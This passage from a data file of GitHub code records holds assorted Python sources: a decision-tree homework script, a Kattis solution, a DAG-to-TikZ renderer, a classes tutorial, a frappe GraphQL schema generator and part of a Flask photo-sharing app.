slDepth[1].append(num.average(crossRes['train_score']))\n\nprint(\"Testing Accuracy:\", slDepth[0])\nprint(\"Training Accuracy:\", slDepth[1])\n\nplt.subplot(1,2,1)\nplt.plot([1,3,5,9], slFeatures[0], 'b-', label=\"Test Score\")\nplt.plot([1,3,5,9], slFeatures[1], 'y-', label=\"Train Score\")\nplt.title(\"Selected Features\")\nplt.legend()\nplt.subplot(1,2,2)\nplt.plot([1,3,5,9], slDepth[0], 'b-')\nplt.plot([1,3,5,9], slDepth[1], 'y-')\nplt.title(\"Max Depth\")\nplt.show()\n\n\"\"\" \n#deepth = []\nfor i in [1,3,5,9]:\n classifier = tree.DecisionTreeClassifier(criterion='entropy', max_depth=i)\n cross = cross_val_score(classifier, input, output, scoring = 'accuracy', cv = kFol)\n print(i, \"deepth:\", num.average(cross))\n #deepth += [num.average(cross)] \"\"\"\n\n\"\"\" plt.plot(x,selected, color='r')\nplt.plot(x,deepth, color='g')\nplt.show() \"\"\"\n\"\"\" \nprint(\"training:\")\nx = [1,3,5,9]\nselected = []\n\n\n\nprint(\"ii.\")\ndeepth = []\nfor i in x:\n tree1 = tree.DecisionTreeClassifier(max_depth=i)\n tree1.fit(obs,target)\n cross = tree1.predict(obs)\n correct = 0\n for j in range(len(target)):\n if cross[j] == target[j]:\n correct+=1\n print(i, \"deepth:\", correct/len(target))\n deepth += [correct/len(target)]\n\nplt.plot(x,selected, color='r')\nplt.plot(x,deepth, color='g')\nplt.show() \"\"\"\n\n\n\n\n\n\n\n\n","repo_name":"HojiReiner/Machine-Learning","sub_path":"homework2/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"22248472444","text":"import sys\n\n\ndef findCombos(linjer):\n numColumns = int(linjer[0].split(\" \")[1])\n piece = int(linjer[0].split(\" \")[0])\n brett = []\n for i in range(5):\n brett.append([])\n\n colored = linjer[1]\n\n for kolonne in range(len(brett)):\n for rad in colored.split(\" \"):\n if int(rad) > kolonne:\n brett[len(brett) - kolonne - 1].append(\"*\")\n else:\n brett[len(brett) - kolonne - 1].append(\"0\")\n\n string = \"\"\n\n for rad in brett:\n for char in rad:\n string += char\n string += \"\\n\"\n return string # return the board so main() prints it once (printing here made main() also print None)\n\n\n\ndef main():\n linjer = [linje for linje in sys.stdin]\n\n print(findCombos(linjer))\nmain()\n","repo_name":"jakobkhansen/KattisSolutions","sub_path":"Tetris/Tetris.py","file_name":"Tetris.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"28248399148","text":"from __future__ import print_function\n\n\nclass DAGSyntaxError(Exception):\n def __init__(self, row, col, msg):\n self.row = row\n self.col = col\n self.msg = msg\n msg = 'Syntax error at (%d, %d): %s' % (row, col, msg)\n super(DAGSyntaxError, self).__init__(msg)\n\n\nclass Node(object):\n def __init__(self, name):\n self.name = name\n self._text = None\n self.parents = [] # list of Node\n self.precursors = [] # list of Node\n self.annotation = ''\n self.row = -1\n self.col = -1\n self.obsolete = False\n self._style = {}\n\n if '^' in name:\n self.name, self.annotation = name.split('^', 1)\n\n if self.annotation in ('O', 'T'):\n self.obsolete = True\n\n def __str__(self):\n return self.name + str(self.row * 10 + self.col)\n\n def __repr__(self):\n return '<Node %s>' % (self.name,)\n\n @property\n def text(self):\n if self._text is None:\n self._text = self.name\n if 'text' in self._style:\n self._text = self._style['text']\n return self._text\n\n def parse(self, nodes, grid, row, col):\n # set the grid location into the node, if not already 
set\n if self.row == -1:\n self.row = row\n if self.col == -1:\n self.col = col\n if self not in nodes:\n nodes.append(self)\n\n def tikz(self, outfile):\n obs = ''\n if self.obsolete:\n obs = 'obs'\n if self.annotation == 'T':\n obs = 'tmp'\n\n cls = self._style.get('class') or obs + 'changeset'\n\n print(r'\\node[%s] at (%d,%d) (%s) {%s};' % (cls, self.col, -self.row,\n self, self.text),\n file=outfile)\n\n\nclass TransitionText(Node):\n def __init__(self, text):\n super(TransitionText, self).__init__('t')\n self._text = text\n\n def __repr__(self):\n return '<TransitionText %s>' % (self.text,)\n\n def append(self, tnode):\n self._text += '\\n' + tnode.text\n\n def parse(self, nodes, grid, row, col):\n super(TransitionText, self).parse(nodes, grid, row, col)\n try:\n # currently transition texts must be next to each other (no extra\n # new lines)\n prevtext = grid[row - 1][col]\n if isinstance(prevtext, TransitionText):\n prevtext.append(self)\n # remove from dag list since we're appending\n if self in nodes:\n nodes.remove(self)\n except IndexError:\n # find the previous, longest row of nodes so that we can center the\n # double down arrow\n longrow = prevrow = []\n for r in range(row - 1, -1, -1):\n prevrow = [e for e in grid[r] if e]\n if len(prevrow) > len(longrow):\n longrow = prevrow\n c = len(longrow)\n self.middle = [longrow[c // 2]]\n if not isinstance(self.middle[0], Node):\n self.middle = [longrow[c // 2 - 1], longrow[c // 2 + 1]]\n\n def tikz(self, outfile):\n anchor = r'($(%s.south)$)' % self.middle[0]\n if len(self.middle) > 1:\n anchor = r'$.5*(%s.south) + .5*(%s.south)$' % (self.middle[0],\n self.middle[1])\n\n lines = self.text.splitlines()\n # the first line is a command, the rest are subtexts\n lines[0] = r'\\small{\\texttt{%s}}' % lines[0]\n for i in range(1, len(lines)):\n lines[i] = r'\\scriptsize\\emph{%s}' % lines[i]\n print('\\\\draw[line width=5pt, -{Latex[length=7mm]}, draw=gray!80] '\n '(%s,%.2f) -- node[midway, anchor=west, align=left] (%s) {%s} '\n '++(0,%.2f);' % (anchor, -(self.row - 1), self,\n '\\\\\\\\'.join(lines), -(len(lines) + 1.5)),\n file=outfile)\n\n # print second arrow on top of the first to produce an outlined arrow\n print('\\\\draw [line width=3pt, -{Latex[length=5mm]}, draw=white] '\n '(%s,%.2f) -- ++(0,%.2f);' % (anchor, -(self.row - 1),\n -(len(lines) + 1.35)),\n file=outfile)\n\n\nclass Style(dict):\n def __repr__(self):\n return '<Style %s>' % (dict.__repr__(self),)\n\n def parse(self, dag, grid, row, col):\n if 'node' not in self:\n raise DAGSyntaxError(row, col, 'style found but no node specified')\n\n for n in dag:\n if self['node'] == 'global' or n.name == self['node']:\n n._style = self\n","repo_name":"seanfarley/asciidag","sub_path":"_extensions/dagmatic/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"33701405752","text":"import shutil\nimport os.path\n\nfrom sandbox import sdk2\nfrom sandbox.projects import resource_types\n\n\nclass UserdataTestDataExtractor(sdk2.Task):\n class Parameters(sdk2.Parameters):\n build_output = sdk2.parameters.Resource(\n 'Build output with test results',\n required=True,\n resource_type=resource_types.BUILD_OUTPUT\n )\n target = sdk2.parameters.String(\n 'Target name to find resources',\n required=True\n )\n index_fragment = sdk2.parameters.String(\n 'When provided, create an index fragment resource from this path suffix',\n required=False\n )\n\n def get_test_output(self):\n src_data = 
sdk2.ResourceData(self.Parameters.build_output)\n return os.path.join(str(src_data.path), self.Parameters.target, \"test-results\", \"pytest\", \"testing_out_stuff\")\n\n def create_tables_archive(self):\n resource = resource_types.USERDATA_TABLES_ARCHIVE(self, \"Tables archive with test data\", \"tables\")\n resource.tables_prefix = \"sandbox/\"\n dst_data = sdk2.ResourceData(resource)\n shutil.copytree(os.path.join(self.get_test_output(), \"tables_dump\"), str(dst_data.path))\n dst_data.ready()\n\n def create_index_fragment(self):\n resource = resource_types.USERDATA_INDEX_FRAGMENT(self, \"Index fragment with test data\", \"index_fragment\")\n dst_data = sdk2.ResourceData(resource)\n\n def ignore_func(src, names):\n return [n for n in names if n in [\"bin\", \"scripts\"]]\n\n shutil.copytree(os.path.join(self.get_test_output(), str(self.Parameters.index_fragment)), str(dst_data.path), ignore=ignore_func)\n\n dst_data.ready()\n\n def on_execute(self):\n self.create_tables_archive()\n if self.Parameters.index_fragment:\n self.create_index_fragment()\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"sandbox/TestDataExtractor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27306530620","text":"# Contents:\n# Class Syntax\n# Classier Classes\n# Let's Not Get Too Selfish\n# Instantiating Your First Object\n# More on __init__() and self\n# Class Scope\n# A Methodical Approach\n# They're Multiplying!\n# It's Not All Animals and Fruits\n# Warning: Here Be Dragons\n# Inheritance Syntax\n# Override!\n# This Looks Like a Job For...\n# Class Basics\n# Class It Up\n# Instantiate an Object\n# Inheritance\n\nprint(\"### Class Syntax ###\")\n# class Animal(object):\n# pass\n\nprint(\"### Classier Classes ###\")\n# class Animal(object):\n# def __init__(self):\n# pass\n\nprint(\"### Let's Not Get Too Selfish ###\")\n# class Animal(object):\n# def __init__(self, name):\n# self.name = name\n\nprint(\"### Instantiating Your First Object ###\")\n# class Animal(object):\n# def __init__(self, name):\n# self.name = name\n#\n# zebra = Animal(\"Jeffrey\")\n#\n# print(zebra.name)\n\nprint(\"### More on __init__() and self ###\")\n# class Animal(object):\n# \"\"\"Makes cute animals.\"\"\"\n# def __init__(self, name, age, is_hungry):\n# self.name = name\n# self.age = age\n# self.is_hungry = is_hungry\n#\n# zebra = Animal(\"Jeffrey\", 2, True)\n# giraffe = Animal(\"Bruce\", 1, False)\n# panda = Animal(\"Chad\", 7, True)\n#\n# print(zebra.name, zebra.age, zebra.is_hungry)\n# print(giraffe.name, giraffe.age, giraffe.is_hungry)\n# print(panda.name, panda.age, panda.is_hungry)\n\nprint(\"### Class Scope ###\")\n# class Animal(object):\n# \"\"\"Makes cute animals.\"\"\"\n# is_alive = True\n# def __init__(self, name, age):\n# self.name = name\n# self.age = age\n#\n# zebra = Animal(\"Jeffrey\", 2)\n# giraffe = Animal(\"Bruce\", 1)\n# panda = Animal(\"Chad\", 7)\n#\n# print(zebra.name, zebra.age, zebra.is_alive)\n# print(giraffe.name, giraffe.age, giraffe.is_alive)\n# print(panda.name, panda.age, panda.is_alive)\n\nprint(\"### A Methodical Approach ###\")\n# class Animal(object):\n# \"\"\"Makes cute animals.\"\"\"\n# is_alive = True\n#\n# def __init__(self, name, age):\n# self.name = name\n# self.age = age\n#\n# def description(self):\n# print(self.name)\n# print(self.age)\n#\n# hippo = Animal(\"Anderson\", 36)\n# hippo.description()\n\nprint(\"### They're Multiplying! 
###\")\nclass Animal(object):\n \"\"\"Makes cute animals.\"\"\"\n is_alive = True\n health = \"good\"\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def description(self):\n print(self.name)\n print(self.age)\n\nhippo = Animal('Anderson', 36)\nsloth = Animal('Dale', 15)\nocelot = Animal('Fuzzy', 7)\n\nprint(hippo.health)\nprint(sloth.health)\nprint(ocelot.health)\n\nprint(\"### It's Not All Animals and Fruits ###\")\nclass ShoppingCart(object):\n \"\"\"Creates shopping cart objects\n for users of our fine website.\"\"\"\n\n def __init__(self, customer_name):\n self.customer_name = customer_name\n self.items_in_cart = {}\n\n def add_item(self, product, price):\n \"\"\"Add product to the cart.\"\"\"\n if not product in self.items_in_cart:\n self.items_in_cart[product] = price\n print(product + \" added.\")\n else:\n print(product + \" is already in the cart.\")\n\n def remove_item(self, product):\n \"\"\"Remove product from the cart.\"\"\"\n if product in self.items_in_cart:\n del self.items_in_cart[product]\n print(product + \" removed.\")\n else:\n print(product + \" is not in the cart.\")\n\nmy_cart = ShoppingCart(\"Eric\")\nmy_cart.add_item(\"Ukelele\", 10)\n\nprint(\"### Warning: Here Be Dragons ###\")\nclass Customer(object):\n \"\"\"Produces objects that represent customers.\"\"\"\n def __init__(self, customer_id):\n self.customer_id = customer_id\n\n def display_cart(self):\n print(\"I'm a string that stands in for the contents of your shopping cart!\")\n\nclass ReturningCustomer(Customer):\n \"\"\"For customers of the repeat variety.\"\"\"\n def display_order_history(self):\n print(\"I'm a string that stands in for your order history!\")\n\nmonty_python = ReturningCustomer(\"ID: 12345\")\nmonty_python.display_cart()\nmonty_python.display_order_history()\n\nprint(\"### Inheritance Syntax ###\")\nclass Shape(object):\n \"\"\"Makes shapes!\"\"\"\n def __init__(self, number_of_sides):\n self.number_of_sides = number_of_sides\n\nclass Triangle(Shape):\n def __init__(self, side1, side2, side3):\n self.side1 = side1\n self.side2 = side2\n self.side3 = side3\n\nprint(\"### Override! ###\")\nclass Employee(object):\n \"\"\"Models real-life employees!\"\"\"\n def __init__(self, employee_name):\n self.employee_name = employee_name\n\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 20.00\n\nclass PartTimeEmployee(Employee):\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 12.00\n\nprint(\"### This Looks Like a Job For... 
###\")\nclass Employee(object):\n \"\"\"Models real-life employees!\"\"\"\n def __init__(self, employee_name):\n self.employee_name = employee_name\n\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 20.00\n\nclass PartTimeEmployee(Employee):\n def calculate_wage(self, hours):\n self.hours = hours\n return hours * 12.00\n\n def full_time_wage(self, hours):\n return super(PartTimeEmployee, self).calculate_wage(hours)\n\nmilton = PartTimeEmployee('Milton')\nprint(milton.full_time_wage(10))\n\nprint(\"### Class Basics ###\")\nclass Triangle(object):\n def __init__(self, angle1, angle2, angle3):\n self.angle1 = angle1\n self.angle2 = angle2\n self.angle3 = angle3\n\nprint(\"### Class It Up ###\")\n# class Triangle(object):\n# number_of_sides = 3\n#\n# def __init__(self, angle1, angle2, angle3):\n# self.angle1 = angle1\n# self.angle2 = angle2\n# self.angle3 = angle3\n#\n# def check_angles(self):\n# if (self.angle1 + self.angle2 + self.angle3) == 180:\n# return True\n# else:\n# return False\n\nprint(\"### Instantiate an Object ###\")\n# class Triangle(object):\n# number_of_sides = 3\n#\n# def __init__(self, angle1, angle2, angle3):\n# self.angle1 = angle1\n# self.angle2 = angle2\n# self.angle3 = angle3\n#\n# def check_angles(self):\n# if (self.angle1 + self.angle2 + self.angle3) == 180:\n# return True\n# else:\n# return False\n#\n# my_triangle = Triangle(30, 60, 90)\n#\n# print(my_triangle.number_of_sides)\n# print(my_triangle.check_angles())\n\nprint(\"### Inheritance ###\")\nclass Triangle(object):\n number_of_sides = 3\n\n def __init__(self, angle1, angle2, angle3):\n self.angle1 = angle1\n self.angle2 = angle2\n self.angle3 = angle3\n\n def check_angles(self):\n if (self.angle1 + self.angle2 + self.angle3) == 180:\n return True\n else:\n return False\n\nclass Equilateral(Triangle):\n angle = 60\n\n def __init__(self):\n self.angle1 = self.angle\n self.angle2 = self.angle\n self.angle3 = self.angle","repo_name":"AlexeyShpavda/LearningPython","sub_path":"18)IntroductionToClasses.py","file_name":"18)IntroductionToClasses.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21502363424","text":"'''\nDescripttion: \nVersion: 1.0\nAuthor: ZhangHongYu\nDate: 2021-05-22 21:15:21\nLastEditors: ZhangHongYu\nLastEditTime: 2021-05-22 21:19:19\n'''\nimport random\nn= 10000\ncnt = 0\nfor i in range(n):\n x = random.random() \n y = random.random()\n if 4*(2*x-1)**4+8*(2*y-1)**8 < 1 + 2*(2*y-1)**3*(3*x-2)**2: #注意python连乘性和优先级\n cnt += 1\nprint(\"面积近似值为:\", cnt/n)","repo_name":"orion-orion/NumericalAnalysis-Python","sub_path":"chapter9.随机数和应用/蒙特卡洛2型问题-随机数近似图形面积.py","file_name":"蒙特卡洛2型问题-随机数近似图形面积.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"66"} +{"seq_id":"21786521575","text":"import re\nimport inflect\n\nimport frappe\nfrom frappe.utils import cint\nfrom frappe.model import default_fields, display_fieldtypes, table_fields\nfrom frappe.model.meta import Meta\n\n\ndef get_doctype_sdl(doctype, options):\n \"\"\"\n options = dict(\n disable_enum_select_fields=False,\n ignore_custom_fields=False\n )\n \"\"\"\n generated_enums = frappe._dict()\n\n meta = frappe.get_meta(doctype)\n sdl, defined_fieldnames = get_basic_doctype_sdl(meta, options=options, generated_enums=generated_enums)\n\n # Extend Doctype with Custom Fields\n if not options.ignore_custom_fields and len(meta.get_custom_fields()):\n 
sdl += get_custom_field_sdl(meta, defined_fieldnames, options=options)\n\n if not options.disable_enum_select_fields:\n sdl += get_select_docfield_enums(meta=meta, options=options, generated_enums=generated_enums)\n\n if not meta.istable:\n\n # DocTypeSortingInput\n if not meta.issingle:\n sdl += get_sorting_input(meta)\n sdl += get_connection_type(meta)\n\n # Extend QueryType\n sdl += get_query_type_extension(meta)\n\n return sdl\n\n\ndef get_basic_doctype_sdl(meta: Meta, options: dict, generated_enums=None):\n dt = format_doctype(meta.name)\n sdl = f\"type {dt} implements BaseDocType {{\"\n\n defined_fieldnames = [] + list(default_fields)\n\n for field in default_fields:\n if field in (\"idx\", \"docstatus\"):\n fieldtype = \"Int\"\n elif field in (\"owner\", \"modified_by\"):\n fieldtype = \"User!\"\n elif field == \"parent\":\n fieldtype = \"BaseDocType\"\n else:\n fieldtype = \"String\"\n sdl += f\"\\n {field}: {fieldtype}\"\n sdl += \"\\n owner__name: String!\"\n sdl += \"\\n modified_by__name: String!\"\n sdl += \"\\n parent__name: String\"\n\n for field in meta.fields:\n if field.fieldtype in display_fieldtypes:\n continue\n if field.fieldname in defined_fieldnames:\n continue\n if cint(field.get(\"is_custom_field\")):\n continue\n defined_fieldnames.append(field.fieldname)\n sdl += f\"\\n {get_field_sdl(meta, field, options=options, generated_enums=generated_enums)}\"\n if field.fieldtype in (\"Link\", \"Dynamic Link\"):\n sdl += f\"\\n {get_link_field_name_sdl(field)}\"\n\n sdl += \"\\n}\"\n\n return sdl, defined_fieldnames\n\n\ndef get_custom_field_sdl(meta, defined_fieldnames, options):\n sdl = f\"\\n\\nextend type {format_doctype(meta.name)} {{\"\n for field in meta.get_custom_fields():\n if field.fieldtype in display_fieldtypes:\n continue\n if field.fieldname in defined_fieldnames:\n continue\n defined_fieldnames.append(field.fieldname)\n sdl += f\"\\n {get_field_sdl(meta, field, options=options)}\"\n if field.fieldtype in (\"Link\", \"Dynamic Link\"):\n sdl += f\"\\n {get_link_field_name_sdl(field)}\"\n sdl += \"\\n}\"\n\n return sdl\n\n\ndef get_select_docfield_enums(meta, options, generated_enums=None):\n sdl = \"\"\n for field in meta.get(\"fields\", {\"fieldtype\": \"Select\"}):\n\n has_no_options = all([len(x or \"\") == 0 for x in (field.options or \"\").split(\"\\n\")])\n\n has_invalid_options = False\n if any([\n contains_reserved_characters(option)\n for option in (field.options or \"\").split(\"\\n\")\n ]):\n has_invalid_options = True\n\n if (options.ignore_custom_fields and cint(field.get(\"is_custom_field\"))) \\\n or has_no_options \\\n or has_invalid_options:\n continue\n\n sdl += \"\\n\\n\"\n sdl += f\"enum {get_select_docfield_enum_name(meta.name, field, generated_enums)} {{\"\n for option in (field.get(\"options\") or \"\").split(\"\\n\"):\n if not option or not len(option):\n continue\n sdl += f\"\\n {frappe.scrub(option).upper()}\"\n\n sdl += \"\\n}\"\n\n return sdl\n\n\ndef get_sorting_input(meta):\n dt = format_doctype(meta.name)\n\n sdl = f\"\\n\\nenum {dt}SortField {{\"\n sdl += \"\\n NAME\"\n sdl += \"\\n CREATION\"\n sdl += \"\\n MODIFIED\"\n for field in meta.fields:\n if not field.search_index and not field.unique:\n continue\n sdl += f\"\\n {field.fieldname.upper()}\"\n sdl += \"\\n}\"\n\n sdl += f\"\\n\\ninput {dt}SortingInput {{\"\n sdl += \"\\n direction: SortDirection!\"\n sdl += f\"\\n field: {dt}SortField!\"\n sdl += \"\\n}\"\n return sdl\n\n\ndef get_connection_type(meta):\n dt = format_doctype(meta.name)\n sdl = f\"\\n\\ntype 
{dt}CountableEdge {{\"\n sdl += \"\\n cursor: String!\"\n sdl += f\"\\n node: {dt}!\"\n sdl += \"\\n}\"\n\n sdl += f\"\\n\\ntype {dt}CountableConnection {{\"\n sdl += \"\\n pageInfo: PageInfo!\"\n sdl += \"\\n totalCount: Int\"\n sdl += f\"\\n edges: [{dt}CountableEdge!]!\"\n sdl += \"\\n}\"\n\n return sdl\n\n\ndef get_query_type_extension(meta: Meta):\n dt = format_doctype(meta.name)\n sdl = \"\\n\\nextend type Query {\"\n if meta.issingle:\n sdl += f\"\\n {dt}: {dt}!\"\n else:\n plural = get_plural(meta.name)\n if plural == meta.name:\n prefix = \"A\"\n if dt[0].lower() in (\"a\", \"e\", \"i\", \"o\", \"u\"):\n prefix = \"An\"\n\n sdl += f\"\\n {prefix}{dt}(name: String!): {dt}!\"\n else:\n sdl += f\"\\n {dt}(name: String!): {dt}!\"\n\n plural_dt = format_doctype(plural)\n sdl += f\"\\n {plural_dt}(filter: [DBFilterInput], sortBy: {dt}SortingInput, \"\n sdl += \"before: String, after: String, \"\n sdl += f\"first: Int, last: Int): {dt}CountableConnection!\"\n\n sdl += \"\\n}\\n\"\n return sdl\n\n\ndef get_field_sdl(meta, docfield, options: dict, generated_enums: list = None):\n return f\"{docfield.fieldname}: {get_graphql_type(meta, docfield, options=options, generated_enums=generated_enums)}\"\n\n\ndef get_link_field_name_sdl(docfield):\n return f\"{docfield.fieldname}__name: String\"\n\n\ndef get_graphql_type(meta, docfield, options: dict, generated_enums=None):\n string_fieldtypes = [\n \"Small Text\", \"Long Text\", \"Code\", \"Text Editor\", \"Markdown Editor\", \"HTML Editor\",\n \"Date\", \"Datetime\", \"Time\", \"Text\", \"Data\", \"Rating\", \"Read Only\",\n \"Attach\", \"Attach Image\", \"Signature\", \"Color\", \"Barcode\", \"Geolocation\", \"Duration\"\n ]\n int_fieldtypes = [\"Int\", \"Long Int\", \"Check\"]\n float_fieldtypes = [\"Currency\", \"Float\", \"Percent\"]\n\n if options.disable_enum_select_fields:\n string_fieldtypes.append(\"Select\")\n\n graphql_type = None\n if docfield.fieldtype in string_fieldtypes:\n graphql_type = \"String\"\n elif docfield.fieldtype in int_fieldtypes:\n graphql_type = \"Int\"\n elif docfield.fieldtype in float_fieldtypes:\n graphql_type = \"Float\"\n elif docfield.fieldtype == \"Link\":\n graphql_type = f\"{format_doctype(docfield.options)}\"\n elif docfield.fieldtype == \"Dynamic Link\":\n graphql_type = \"BaseDocType\"\n elif docfield.fieldtype in table_fields:\n graphql_type = f\"[{format_doctype(docfield.options)}!]!\"\n elif docfield.fieldtype == \"Password\":\n graphql_type = \"Password\"\n elif docfield.fieldtype == \"Select\":\n graphql_type = get_select_docfield_enum_name(meta.name, docfield, generated_enums)\n\n # Mark NonNull if there is no empty option and is required\n has_empty_option = all([len(x or \"\") == 0 for x in (docfield.options or \"\").split(\"\\n\")])\n\n has_invalid_options = False\n if any([\n contains_reserved_characters(option)\n for option in (docfield.options or \"\").split(\"\\n\")\n ]):\n has_invalid_options = True\n\n if has_empty_option or has_invalid_options:\n graphql_type = \"String\"\n if docfield.reqd:\n graphql_type += \"!\"\n else:\n frappe.throw(f\"Invalid fieldtype: {docfield.fieldtype}\")\n\n if docfield.reqd and graphql_type[-1] != \"!\":\n graphql_type += \"!\"\n\n return graphql_type\n\n\ndef get_plural(doctype):\n p = inflect.engine()\n return p.plural(doctype)\n\n\ndef format_doctype(doctype):\n return remove_reserved_characters(doctype.replace(\" \", \"\").replace(\"-\", \"_\"))\n\n\ndef get_select_docfield_enum_name(doctype, docfield, generated_enums=None):\n\n name = 
remove_reserved_characters(\n f\"{doctype}{(docfield.label or docfield.fieldname).title()}SelectOptions\"\n .replace(\" \", \"\"))\n\n if hasattr(generated_enums,'values'):\n if name in generated_enums.values():\n name = remove_reserved_characters(\n f\"{doctype}{(docfield.fieldname).title()}SelectOptions\"\n .replace(\" \", \"\"))\n\n if generated_enums is not None:\n if docfield in generated_enums:\n name = generated_enums[docfield]\n else:\n generated_enums[docfield] = name\n\n return name\n\n\ndef remove_reserved_characters(string):\n return re.sub(r\"[^A-Za-z0-9_ ]\", \"\", string)\n\n\ndef contains_reserved_characters(string):\n if not string:\n return False\n\n matches = re.match(r\"^[A-Za-z_ ][A-Za-z0-9_ ]*$\", string)\n if matches:\n return False\n else:\n return True\n","repo_name":"leam-tech/frappe_graphql","sub_path":"frappe_graphql/utils/generate_sdl/doctype.py","file_name":"doctype.py","file_ext":"py","file_size_in_byte":9102,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"66"} +{"seq_id":"29408655403","text":"from app import app, db\nfrom flask import Flask, render_template, url_for, request, flash, redirect, send_from_directory\nfrom flask_login import login_required, current_user, login_user, logout_user\nfrom werkzeug.urls import url_parse\nfrom werkzeug.utils import secure_filename\nfrom app.models import User, Post, Comment\nfrom app.forms import LoginForm, RegistrationForm, EditProfile, EmptyForm\nimport os\n\n@app.shell_context_processor\ndef make_shell_context():\n\treturn {'db': db, 'User': User, \"Post\": Post, \"Comment\": Comment}\n\n@app.route('/', methods=[\"GET\", \"POST\"])\n@app.route('/index', methods=[\"GET\", \"POST\"])\n@login_required\ndef index():\n\tform = EmptyForm()\n\tall_users = User.query.all()\n\tall_posts_all_users = []\n\tfor user in all_users:\n\t\tuser_posts_query = user.posts\n\t\tfor post in user_posts_query:\n\t\t\tall_posts_all_users.append(post)\n\t'''\n\tfor post in all_posts_all_users:\n\t\tprint(\"post id {}\".format(post.id))\n\t\tprint(\"post image_url {}\".format(post.image_url))\n\t\tprint(\"post author {}\".format(post.author))\n\t\tprint(\"post timestamp {}\".format(post.timestamp))'''\n\n\treturn render_template('index.html', all_posts_all_users=all_posts_all_users, form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('index'))\n\tform = LoginForm()\n\tif form.validate_on_submit():\n\t\tuser = User.query.filter_by(username=form.username.data).first()\n\t\tif user is None or not user.check_password(form.password.data):\n\t\t\tflash('Invalid username or password', category=\"error\")\n\t\t\treturn redirect(url_for('login'))\n\t\tlogin_user(user, remember=form.remember_me.data)\n\t\tnext_page = request.args.get('next')\n\t\tif not next_page or url_parse(next_page).netloc != '':\n\t\t\tnext_page = url_for('index')\n\t\treturn redirect(next_page)\n\treturn render_template('login.html', title='Sign In', form=form)\n\n@app.route('/logout')\ndef logout():\n\tlogout_user()\n\treturn redirect(url_for('index'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n\tif current_user.is_authenticated:\n\t\treturn redirect(url_for('index'))\n\tform = RegistrationForm()\n\tif form.validate_on_submit():\n\t\tuser = User(username=form.username.data, \n\t\t\t\t\temail=form.email.data, 
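# the remaining profile fields are copied straight from the registration form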
\n\t\t\t\t\tfirstname=form.firstname.data,\n\t\t\t\t\tlastname=form.lastname.data,\n\t\t\t\t\tbio=form.bio.data,\n\t\t\t\t\twebsite=form.website.data)\n\t\tuser.set_password(form.password.data)\n\t\tdb.session.add(user)\n\t\tdb.session.commit()\n\t\tflash('Account Created!')\n\t\treturn redirect(url_for('upload_avatar'))\n\treturn render_template('register.html', title='Register', form=form)\n\n@app.route('/upload_avatar', methods=['GET','POST'])\n@login_required\ndef upload_avatar():\n\tif request.method == 'POST':\n\t\treturn redirect(url_for('avatar_upload'))\n\treturn render_template('upload_avatar.html')\n\n@app.route('/newpost', methods=['POST'])\n@login_required\ndef newpost():\n\t#--- Image Upload ---#\n\tdef allowed_file(filename):\n\t\treturn '.' in filename and \\\n\t\t\tfilename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\t\n\tbasedir = os.path.abspath(os.path.dirname(__file__))\n\t\n\t# check if the post request has the file part\n\tif 'file' not in request.files:\n\t\tflash('No file part')\n\t\treturn redirect(request.url)\n\tfile = request.files['file']\n\t\n\t# If the user does not select a file, the browser submits an\n\t# empty file without a filename.\n\tif file.filename == '':\n\t\tflash('No selected file')\n\t\treturn redirect(request.url)\n\t\n\t# Upload file to static\n\tif file and allowed_file(file.filename):\n\t\tfilename = secure_filename(file.filename)\n\t\tfile.save(os.path.join(basedir + app.config['UPLOAD_FOLDER']) + filename)\n\n\t\t# Add post to db\n\t\tcaption_text = request.form['caption_text']\n\t\timage_url = \"./static/images/\" + filename\n\t\tnew_post = Post(image_url=image_url, caption=caption_text, author=current_user)\n\t\tdb.session.add(new_post)\n\t\tdb.session.commit()\n\t\t\n\t\t# Add tags to db\n\t\tflash('Your Post Has Been Created!')\n\t\t#return redirect(url_for('new_post_caption'), image_url=image_url)\n\t\tusername = current_user.username\n\t\treturn redirect(url_for('user', username=username))\n\t\n\telse:\n\t\tflash('There was a problem with your upload - please try again')\n\t\treturn redirect(url_for('index'))\n\n@app.route('/new_comment', methods=[\"POST\"])\n@login_required\ndef new_comment():\n\tform = request.form\n\tcomment_text = form['comment_text']\n\tpost_id = form['post_id']\n\t#print('POST ID: {}'.format(post_id))\n\tpost = Post.query.get(post_id)\n\n\tnew_comment = Comment(body=comment_text, user_id=current_user.id, post_id=post_id)\n\tdb.session.add(new_comment)\n\tdb.session.commit()\n\tflash('Your comment has been added! 
